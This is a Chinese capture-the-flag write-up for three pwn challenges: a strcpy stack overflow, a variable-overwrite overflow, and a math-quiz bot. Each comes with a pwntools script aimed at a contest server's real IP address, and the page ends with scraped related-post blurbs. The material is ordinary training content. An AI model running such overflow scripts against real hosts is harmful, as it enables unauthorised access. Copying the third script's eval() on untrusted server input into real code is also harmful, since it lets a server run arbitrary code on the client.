GJCTF 官方WP PWN部分
GJCTF 官方WP PWN部分
1、题目链接:http://www.czlgjbbq.top/GJCTF/pwn_stack
连接方式:nc 188.131.185.193 50000
逆向分析:使用IDA32打开。
定位MAIN函数,F5看源码。很容易发现存在危险函数strcpy,并存在溢出漏洞。v5在这里是ID,v4在这里是name,程序我们需要通过覆盖name来让ID为1000,从而拿到执行系统命令拿到FLAG值。
PYTHON脚本:
#!/usr/bin/env python
#coding=utf-8
from pwn import *
s = remote("188.131.185.193",50000)
s.recvline()
s.recvline()
s.sendline("USER user:)")
s.sendline("PASS pass:)")
s.recvline()
s.sendline("1234")
s.recvline()
s.sendline("aaaaaaaa1000")
s.interactive()
运行结果:
2、题目链接:http://www.czlgjbbq.top/GJCT/int_overflow
连接方式:nc 188.131.185.193 50001
IDA32打开。锁定main函数,F5看主函数。
发现是整数溢出漏洞。对十进制数1633837924转换成16进制进行分析。
由于在linux中,栈是由栈底向栈顶增长,所以这里我们将0x64626364转换成ASCII码后再转换成字符型,(先进后出,就是dcba)
第一位会被存在变量V4中。V4先进栈,V5后进栈。V4无法接受时,向栈顶增长,则会覆盖V5的地址中的内容。
这里直接给出python脚本。
#!/usr/bin/env python
from pwn import *
s = remote("188.131.185.193",50001)
s.recvline()
s.recvline()
s.sendline('adcba')
s.interactive()
运行结果:
3、连接方式:nc 188.131.185.193 50002
本题可以先使用NC连接一下。发现有做不完的数学题==
这个时候我们可以写个python脚本来代替我们人工计算,从而拿到flag。本题整体而言比较简单。只是写写脚本,完全没有达到CTF的难度好不好!@#……%¥#@!
下面给出python脚本:
#!/usr/bin/env python
#coding=utf-8
from pwn import *
s = remote("188.131.185.193",50002)
count = 0
while True:try:print s.recvline()s.recvline()expression = s.recvline().replace("\n","")s.recvuntil("Please input your Answer:")result = eval(expression)s.sendline(str(result))count = count + 1print "time:"+str(count)except:break
运行结果:
GJCTF 官方WP PWN部分相关推荐
- decode判断不为空拼接_空指针4月内部赛官方WP
本次内部赛含WEB跟RE题目各一道,其中RE题目7人解出,WEB题目1人解出,恭喜以上选手. 下面放上本次内部赛的WP. RE题目由于前几次的空指针题目太难了,所以这次出了一道较为简单的题(要不然每次 ...
- 2021天翼杯 密码官方wp
2021天翼杯 crypto TryHash 审计题目代码,题目给出了一个feistel结构的加密算法,密钥长度为8字节.用随机生成的密钥对flag进行了加密.攻击者可以提供一段明文让服务器用同样的密 ...
- CDUT新生赛wp pwn web
一起讲了得了 贝壳是什么东西 kali中终端运行 nc ctf.dino209.cn 8001 然后直接拿到flag EZのStack_Overflow 栈溢出的题 ida打开 双击第四行函数 可以看 ...
- 2019UNCTF-竞技赛 部分WP
2019UNCTF-竞技赛 部分WP emmmm,比赛结束了,,,, 无奈本人太菜,只能做几个题,,,, flag部分白嫖,部分靠混,,,, web checkin 直接白嫖~~,nodejs注入,而 ...
- CTFshow 击剑杯 部分WP
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...
- 第五届百越杯线上赛部分WP
Web BabyPHP 一访问容器就给了PHP代码 <?php error_reporting(1); class Read {private $var;public function file ...
- 2019 moeCTF新生题 部分wp
author: xiaohuihui status: 初步完成,带×的题目尚未解出,已经出官方wp 官方wp: https://github.com/XDSEC/moeCTF_2019 说明1:题目附 ...
- ctfshow-新手杯-crypto4新手村难度-wp
ctfshow-新手杯 先贴一贴官方wp 国庆放假摆得太厉害,忘记了还有比赛,放完后赶紧回来补一补 crypto4 新手村难度 贴贴题目 from Crypto.Util.number import ...
- CTF Web题 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...
最新文章
- 正则 不区分大小写_为什么要学正则表达式 7
- 120种小狗图像傻傻分不清?用fastai训练一个分类器
- 女儿社交媒体求生日卡 美96岁失明二战老兵收海量祝福
- php lang无效,详解 Go 中的不可变类型
- python3 乱序函数 shuffle 简介
- 多个DIV排列时居中
- Flex 按钮添加图标
- onmousemove和onmouseout事件的调用,和js使用双引号、单引号的时候应该注意的问题...
- hadoop主节点切换_hadoop2.0 HA的主备自动切换
- 3个平台下的ffmpeg——ffmpeg编译
- 使用FlexBox和Json实现类似ComboBox(类似Google的输入提示和自动)功能-基于JQuery-ASP.NET...
- 无重复字符最长字串的滑动窗口结合哈希表解法(注释详尽)
- msm8953抓取audio kernel dsp log
- 配置一个强大的FireFox
- 用JMS578转接板开卡PS3111主控pSLC模式,带固件下载
- android studio闹钟小程序,闹钟应用程序Android Studio
- 黑客的滑铁卢——美国大断网全纪实
- latex里图片大小如何调整_如何使Latex中的图片放大依然清晰
- PDF文件如何在线翻译成中文
- 看一遍都懂的数组遍历~确定不试试?
热门文章
- M域、B域、O域分别指什么?
- 保护眼睛(改变窗口颜色和Pdf背景颜色)xp和WIN7方法
- dry的原理_Dry Etch 工艺基本原理及良率剖析(经典讲解)
- 2021信息安全工程师学习笔记(四)
- 热门股权转让项目:临沂泰森置业发展有限公司70%股权转让
- 计算机经常无法打印机,为什么我电脑连接打印机老是出现这种情况~重启也不行...
- qq邮箱android版官方,QQ邮箱下载_腾讯QQ邮箱客户端下载【安卓版】-太平洋下载中心...
- Microsoft Edge打开主页就是2345界面
- 俩人同样写代码,我拿七千他咋五万八...
- mysql 两个字段相乘_触发将来自不同表的两列与mysql中的函数相乘